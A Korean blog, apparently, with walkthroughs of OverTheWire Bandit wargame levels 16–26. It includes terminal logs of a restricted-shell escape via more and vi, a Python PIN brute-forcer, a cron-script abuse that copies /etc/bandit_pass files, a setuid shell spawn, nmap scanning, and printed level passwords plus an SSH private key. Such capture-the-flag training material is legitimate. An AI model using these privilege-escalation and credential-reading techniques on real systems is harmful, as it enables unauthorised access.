Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

이번 문제는 26에 로그인하긴 쉬우나 쉘이 /bin/bash가 아니라고 한다. 일단 문제를 풀어보도록 하자


bandit25@melinda:~$ ls

bandit26.sshkey

bandit25@melinda:~$ ssh -i bandit26.sshkey bandit26@localhost

Could not create directory '/home/bandit25/.ssh'.

The authenticity of host 'localhost (127.0.0.1)' can't be established.

ECDSA key fingerprint is 05:3a:1c:25:35:0a:ed:2f:cd:87:1c:f6:fe:69:e4:f6.

Are you sure you want to continue connecting (yes/no)? yes

Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).


This is the OverTheWire game server. More information on http://www.overthewire.org/wargames


Please note that wargame usernames are no longer level<X>, but wargamename<X>

e.g. vortex4, semtex2, ...


Note: at this moment, blacksun is not available.


Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.18.1-x86_64-linode50 x86_64)


 * Documentation:  https://help.ubuntu.com/


Welcome to the OverTheWire games machine !


Please read /README.txt for more information on how to play the levels

on this gameserver.


*** System restart required ***


The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.



The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.


  _                     _ _ _   ___   __

 | |                   | (_) | |__ \ / /

 | |__   __ _ _ __   __| |_| |_   ) / /_

 | '_ \ / _` | '_ \ / _` | | __| / / '_ \

 | |_) | (_| | | | | (_| | | |_ / /| (_) |

 |_.__/ \__,_|_| |_|\__,_|_|\__|____\___/

Connection to localhost closed.

bandit25@melinda:~$


ls를 해보니 홈디렉토리안에 private key 파일이 있어 해당 파일을 이용해 bandit26으로 로그인 했다.

하지만, bandit26이라는 메세지만 남기고 커넥션을 닫아버리고 만다.


bandit25@melinda:~$ cat /etc/passwd | grep bandit26

bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

bandit25@melinda:~$ cat /usr/bin/showtext

#!/bin/sh


more ~/text.txt

exit 0

bandit25@melinda:~$


기본 쉘이 잘못되어 있나 해서 /etc/passwd의 쉘 부분을 살펴보았는데 more을 이용하여 text.txt를 읽은후 종료한다.

more은 화면크기에 맞게 텍스트 파일을 잘라서 표시하는 명령어다. 한마디로 화면이 작으면 중간에 잘린다.

의도적으로 화면 크기를 줄여 텍스트 파일이 잘리도록 유도해보자.




이렇게 위와 같이 잘린다. 여기에서 어떻게 할지 고민하다가 more의 메뉴얼을 보았더니 아래와 같은 옵션이 있었다.



대충 v를 누르면 vi로 들어간다는 내용이다. v를 눌러보도록 하자.




:r[filename] read filename into VI

vi에도 옵션이 있다. 위와 같이 :r을  쓰고 파일네임을 입력하면 해당 파일을 읽어와서 출력한다.

vi는 bandit26 권한으로 실행되어 있으므로, 패스워드 파일을 읽을 수 있다.



5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 25  (0) 2015.02.11
OverTheWire – Bandit Level 24  (0) 2015.02.09
OverTheWire – Bandit Level 23  (0) 2014.12.29
OverTheWire – Bandit Level 22  (0) 2014.12.29
OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinaties, called brute-forcing.

문제를 읽어보면 30002 포트가 열려있고 여기에 bandit24의 패스워드와 4자리의 핀코드를 입력하면, bandit25의 비밀번호를 알려준다고 적혀있다.


bandit24@melinda:/tmp/zairo$ telnet localhost 30002 

Trying 127.0.0.1...  

Connected to localhost. 

Escape character is '^]'.  

I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.  

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000 

Wrong! Please enter the correct pincode. Try again. 

bandit23@melinda:~$

이렇게 입력하면 틀렸을때 Wrong! 이라는 메시지가 나온다는 것을 알 수 있다.


이걸 일일히 다 수작업으로 할 수 없는 노릇이니, 프로그래밍을 하여 문제를 풀도록 하자. 필자는 파이썬으로 프로그래밍을 했다.

#-*- coding: utf-8 -*-
from socket import *
from select import select
import sys
import time

HOST = '127.0.0.1'
PORT = 30002
BUFSIZE = 1024
ADDR = (HOST, PORT)

clientSocket = socket(AF_INET, SOCK_STREAM)

try:
    clientSocket.connect(ADDR)
except Exception as e:
    print('Connection Failed (%s:%s)' % ADDR)
    sys.exit()
print('Connection Success (%s:%s)' % ADDR)
n = 0
while True:
    try:
        connection_list = [sys.stdin, clientSocket]
 
        read_socket, write_socket, error_socket = select(connection_list, [], [], 10)
 
        for sock in read_socket:
            if sock == clientSocket:
                data = sock.recv(BUFSIZE)
                if not data:
                    print('Connection Failed (%s:%s)' % ADDR)
                    clientSocket.close()
                    sys.exit()
                else:
                    print data
                    if "Wrong!" not in data and n:
                        print "[*] Find Password !!"
                        sys.exit()
            else:
                message = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ "+str('%04d' % n)+"\n"
                n = n+1
                clientSocket.send(message)
                print message
    except KeyboardInterrupt:
        clientSocket.close()
        sys.exit()
    if n > 9999:
        sys.exit()
    time.sleep(0.05)


위의 소스는 필자가 프로그래밍한 소스이다.

이제 이걸 /tmp 디렉터리에 저장한후 실행시켜보자.


bandit24@melinda:/tmp/zairo$ python ./bandit24.py

I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.  

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000


Wrong! Please enter the correct pincode. Try again. 

.

.

.

.

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5665


Wrong! Please enter the correct pincode. Try again. 


UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5666 


Wrong! Please enter the correct pincode. Try again.

 

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5667 


Wrong! Please enter the correct pincode. Try again


UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5668


Wrong! Please enter the correct pincode. Try again.


UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5669


Wrong! Please enter the correct pincode. Try again.


UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 5670


Correct!                                                                                  

The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG


Exiting.                                                                               

                                                                                       

[*] Find Password !! .


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 25  (0) 2015.02.11
OverTheWire – Bandit Level 24  (0) 2015.02.09
OverTheWire – Bandit Level 23  (0) 2014.12.29
OverTheWire – Bandit Level 22  (0) 2014.12.29
OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.


이 문제 또한 크론 설정파일을 보는 것이다. 스크립트를 보면 해당 파일을 삭제하기 전에 실행을 하는데 이를 이용하면 자신이 원하는 파일을 실행시킬수도 있다. 스크립트를 작성하여 해당 경로에 이동하여 실행시켜 보자.


bandit23@melinda:~$ cat /etc/cron.d/

.placeholder           leviathan5_cleanup     natas26_cleanup        semtex5

behemoth4_cleanup      manpage3_resetpw_job   natas27_cleanup        sysstat

cron-apt               melinda-stats          php5                   vortex0

cronjob_bandit22       natas-session-toucher  semtex0-32             vortex20

cronjob_bandit23       natas-stats            semtex0-64

cronjob_bandit24       natas25_cleanup        semtex0-ppc

bandit23@melinda:~$ cat /etc/cron.d/cronjob_bandit24

* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh

#!/bin/bash


myname=$(whoami)


cd /var/spool/$myname

echo "Executing and deleting all scripts in /var/spool/$myname:"

for i in *;

do

    echo "Handling $i"

    ./$i

    rm -f $i

done


bandit23@melinda:~$

bandit23@melinda:~$ mkdir /tmp/zairo4

bandit23@melinda:~$ vi /tmp/zairo4/script

#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/zairo4/password.txt


bandit23@melinda:~$ chmod 777 /tmp/zairo4/script

bandit23@melinda:~$ chmod 777 /tmp/zairo4/

bandit23@melinda:~$ cp /tmp/zairo4/script /var/spool/bandit24

bandit23@melinda:~$ ls /tmp/zairo4

script

bandit23@melinda:~$ ls /tmp/zairo4

password.txt  script

bandit23@melinda:~$ cat /tmp/zairo4/password.txt

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

bandit23@melinda:~$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 25  (0) 2015.02.11
OverTheWire – Bandit Level 24  (0) 2015.02.09
OverTheWire – Bandit Level 23  (0) 2014.12.29
OverTheWire – Bandit Level 22  (0) 2014.12.29
OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.


이 문제 또한 전 문제와 같이 크론설정을 보는 문제이다. whoami를 한 값을 변수에 넣고 I am user $(whoami) 값을 MD5로 해쉬화하여 tmp의 해쉬화한 경로에 저장하는 스크립트이다.

이 스크립트를 실행하는 user는 bandit23 일테니 변수에 bandit23을 넣고 직접 해쉬화 해보자.


bandit22@melinda:~$ ls

bandit22@melinda:~$ cat /etc/cron.d/

.placeholder           leviathan5_cleanup     natas26_cleanup        semtex5

behemoth4_cleanup      manpage3_resetpw_job   natas27_cleanup        sysstat

cron-apt               melinda-stats          php5                   vortex0

cronjob_bandit22       natas-session-toucher  semtex0-32             vortex20

cronjob_bandit23       natas-stats            semtex0-64

cronjob_bandit24       natas25_cleanup        semtex0-ppc

bandit22@melinda:~$ cat /etc/cron.d/cronjob_bandit23

* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

bandit22@melinda:~$ cat /usr/bin/cronjob_bandit23.sh

#!/bin/bash


myname=$(whoami)

mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)


echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"


cat /etc/bandit_pass/$myname > /tmp/$mytarget

bandit22@melinda:~$

bandit22@melinda:~$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1

8ca319486bfbbc3663ea0fbe81326349

bandit22@melinda:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349

jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

bandit22@melinda:~$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 24  (0) 2015.02.09
OverTheWire – Bandit Level 23  (0) 2014.12.29
OverTheWire – Bandit Level 22  (0) 2014.12.29
OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29
OverTheWire – Bandit Level 19  (0) 2014.12.29

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

이 문제는 /etc/cron.d에 주기적으로 실행되고 있는 프로그램이 있으니, 해당 프로그램을 확인하라는 문제이다.

확인 해보면 /etc/bandit_pass/bandit22를 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv에 저장하는 것을 확인할 수 있다.


bandit21@melinda:~$ cat /etc/cron.d/

.placeholder           leviathan5_cleanup     natas26_cleanup        semtex5

behemoth4_cleanup      manpage3_resetpw_job   natas27_cleanup        sysstat

cron-apt               melinda-stats          php5                   vortex0

cronjob_bandit22       natas-session-toucher  semtex0-32             vortex20

cronjob_bandit23       natas-stats            semtex0-64

cronjob_bandit24       natas25_cleanup        semtex0-ppc

bandit21@melinda:~$ cat /etc/cron.d/cronjob_bandit22

* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

bandit21@melinda:~$ cat /usr/bin/cronjob_bandit22.sh

#!/bin/bash

chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@melinda:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

bandit21@melinda:~$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 23  (0) 2014.12.29
OverTheWire – Bandit Level 22  (0) 2014.12.29
OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29
OverTheWire – Bandit Level 19  (0) 2014.12.29
OverTheWire – Bandit Level 18  (0) 2014.12.29

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).


문제를 보면 홈 디렉토리에 setuid가 지정된 바이너리 파일이 있는데, 그 파일은 로컬 호스트의 특정 포트로 연결을 하며, 프로그램에게 현재 패스워드를 전송하면 다음 단계의 패스워드를 알려준다고 한다.

이번 문제는 쉘이 두개가 필요하다. 창을 두개 열어 하나에서는 nc 명령어로 포트를 열고 다른 창에서는 해당 포트로 접속을 한다. 그리고 다시 nc 명령어가 실행된 창에서 현재 패스워드를 전송해주면, 다음 단계의 패스워드를 반환한다.


bandit20@melinda:~$ nc -l 50000

GbKksEFF4yrVs6il55v6gwY5aVje5f0j

gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

bandit20@melinda:~$


bandit20@melinda:~$ ./suconnect 50000

Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Password matches, sending next password

bandit20@melinda:~$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 22  (0) 2014.12.29
OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29
OverTheWire – Bandit Level 19  (0) 2014.12.29
OverTheWire – Bandit Level 18  (0) 2014.12.29
OverTheWire – Bandit Level 17  (0) 2014.12.29

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.


문제를 보면 홈 디렉토리에 setuid가 걸려잇는 바이너리 파일이 하나있으니 이것을 사용해서 /etc/bandit_pass의 패스워드를 볼 수 있다고 한다.

Setuid는 프로그램을 실행할 동안 해당 파일의 소유자로 권한이 상승되게 됨으로써 잘못 사용하게 되면 엄청난 보안 취약점을 초래할 수 있다.


bandit19@melinda:~$ ls

bandit20-do

bandit19@melinda:~$ ./bandit20-do /bin/sh

$ id

uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11020(bandit20),11019(bandit19)

$ cat /etc/bandit_pass/bandit20

GbKksEFF4yrVs6il55v6gwY5aVje5f0j

$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 21  (0) 2014.12.29
OverTheWire – Bandit Level 20  (0) 2014.12.29
OverTheWire – Bandit Level 19  (0) 2014.12.29
OverTheWire – Bandit Level 18  (0) 2014.12.29
OverTheWire – Bandit Level 17  (0) 2014.12.29
OverTheWire – Bandit Level 16  (0) 2014.12.29
The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

문제를 보면 불행하게도 누군가가 .bashrc를 수정하여 로그인 하자마자 로그아웃 하도록 만들었다고 한다. 하지만 다음단계로 가는 패스워드는 readme 파일에 있으니, 그 파일을 열어보라고 한다.

ssh의 사용법을 자세히 보면 

ssh [-l 사용자명] [-p 포트번호] 호스트명|사용자명@호스트명 [커맨드]

가장 뒤에 커맨드가 있는 것을 볼 수 있다.

이 커맨드 부분에 cat readme를 전송하면 되지 않을까?


root@nullhost:~/zairo/etc# ssh bandit18@bandit.labs.overthewire.org cat readme


This is the OverTheWire game server. More information on http://www.overthewire.org/wargames


Please note that wargame usernames are no longer level<X>, but wargamename<X>

e.g. vortex4, semtex2, ...


Note: at this moment, blacksun and drifter are not available.


bandit18@bandit.labs.overthewire.org's password:

IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

root@nullhost:~/zairo/etc#


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 20  (0) 2014.12.29
OverTheWire – Bandit Level 19  (0) 2014.12.29
OverTheWire – Bandit Level 18  (0) 2014.12.29
OverTheWire – Bandit Level 17  (0) 2014.12.29
OverTheWire – Bandit Level 16  (0) 2014.12.29
OverTheWire – Bandit Level 15  (0) 2014.12.29

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new


문제를 보면 passwords.old와 passwords.new의 한 라인에 다른 부분이 있고, 그 다른 부분중 password.new에 있는 값이 다음 단계로 가는 패스워드 라고 한다.

diff 명령어를 사용하면 두가지의 파일 중 다른부분만을 추려내어 보여준다.


bandit17@melinda:~$ diff ./passwords.old ./passwords.new

42c42

< BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR

---

> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

bandit17@melinda:~$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 19  (0) 2014.12.29
OverTheWire – Bandit Level 18  (0) 2014.12.29
OverTheWire – Bandit Level 17  (0) 2014.12.29
OverTheWire – Bandit Level 16  (0) 2014.12.29
OverTheWire – Bandit Level 15  (0) 2014.12.29
OverTheWire – Bandit Level 14  (0) 2014.12.29

The password for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next password, the others will simply send back to you whatever you send to it.


문제를 보면 로컬 호스트의 31000~32000 포트 중 현재 패스워드를 전송하면 다음 단계로 갈 수 있는 패스워드를 반환해주는 포트가 존재한다고 한다.

먼저 포트가 리스닝을 하는지 부터 알아보기 위해 nmap을 이용해서 포트스캐닝을 한다.

그 다음, 나온 포트에 하나씩 현재 패스워드를 전송해본다. 그러다가 ssh private key를 반환하는 포트를 하나 찾았다. 그 다음엔 전에 풀었던 문제와 같이 -i 옵션을 이용하여 반환한 ssh private key를 이용해 bandit17로 접속한 후 /etc/bandit_pass/bandit17을 읽는다.


bandit16@melinda:~$ nmap -sT -p 31000-32000 -v 127.0.0.1


Starting Nmap 6.40 ( http://nmap.org ) at 2014-12-28 18:29 UTC

Initiating Ping Scan at 18:29

Scanning 127.0.0.1 [2 ports]

Completed Ping Scan at 18:29, 0.00s elapsed (1 total hosts)

Initiating Connect Scan at 18:29

Scanning localhost (127.0.0.1) [1001 ports]

Discovered open port 31790/tcp on 127.0.0.1

Discovered open port 31960/tcp on 127.0.0.1

Discovered open port 31691/tcp on 127.0.0.1

Discovered open port 31046/tcp on 127.0.0.1

Discovered open port 31518/tcp on 127.0.0.1

Completed Connect Scan at 18:29, 0.04s elapsed (1001 total ports)

Nmap scan report for localhost (127.0.0.1)

Host is up (0.00080s latency).

Not shown: 996 closed ports

PORT      STATE SERVICE

31046/tcp open  unknown

31518/tcp open  unknown

31691/tcp open  unknown

31790/tcp open  unknown

31960/tcp open  unknown


Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

bandit16@melinda:~$ openssl s_client -connect localhost:31046 -quiet

140737354049184:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:795:

bandit16@melinda:~$ openssl s_client -connect localhost:31518 -quiet

depth=0 CN = li190-250.members.linode.com

verify error:num=18:self signed certificate

verify return:1

depth=0 CN = li190-250.members.linode.com

verify return:1

cluFn7wTiGryunymYOu4RcffSxQluehd

cluFn7wTiGryunymYOu4RcffSxQluehd

^C

bandit16@melinda:~$ openssl s_client -connect localhost:31691 -quiet

140737354049184:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:795:

bandit16@melinda:~$ openssl s_client -connect localhost:31790 -quiet

depth=0 CN = li190-250.members.linode.com

verify error:num=18:self signed certificate

verify return:1

depth=0 CN = li190-250.members.linode.com

verify return:1

cluFn7wTiGryunymYOu4RcffSxQluehd

Correct!

-----BEGIN RSA PRIVATE KEY-----

MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ

imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ

Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu

DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW

JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX

x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD

KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl

J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd

d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC

YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A

vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama

+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT

8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx

SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd

HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt

SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A

R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi

Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg

R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu

L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni

blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU

YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM

77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b

dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3

vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=

-----END RSA PRIVATE KEY-----


read:errno=0

bandit16@melinda:~$

bandit16@melinda:~$ mkdir /tmp/zairo3

bandit16@melinda:~$ vi /tmp/zairo3/key

bandit16@melinda:~$ chmod 600 /tmp/zairo3/key

bandit16@melinda:~$ ssh -i /tmp/zairo3/key bandit17@localhost

Could not create directory '/home/bandit16/.ssh'.

The authenticity of host 'localhost (127.0.0.1)' can't be established.

ECDSA key fingerprint is 05:3a:1c:25:35:0a:ed:2f:cd:87:1c:f6:fe:69:e4:f6.

Are you sure you want to continue connecting (yes/no)? yes

Failed to add the host to the list of known hosts (/home/bandit16/.ssh/known_hosts).


This is the OverTheWire game server. More information on http://www.overthewire.org/wargames


Please note that wargame usernames are no longer level<X>, but wargamename<X>

e.g. vortex4, semtex2, ...


Note: at this moment, blacksun and drifter are not available.


Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.16.5-x86_64-linode46 x86_64)


 * Documentation:  https://help.ubuntu.com/


Welcome to the OverTheWire games machine !


Please read /README.txt for more information on how to play the levels

on this gameserver.


*** System restart required ***


The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.



The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.


bandit17@melinda:~$

bandit17@melinda:~$ cat /etc/bandit_pass/bandit17

xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

bandit17@melinda:~$


'Challenge > OverTheWire - Bandit' 카테고리의 다른 글

OverTheWire – Bandit Level 18  (0) 2014.12.29
OverTheWire – Bandit Level 17  (0) 2014.12.29
OverTheWire – Bandit Level 16  (0) 2014.12.29
OverTheWire – Bandit Level 15  (0) 2014.12.29
OverTheWire – Bandit Level 14  (0) 2014.12.29
OverTheWire – Bandit Level 13  (0) 2014.12.29

+ Recent posts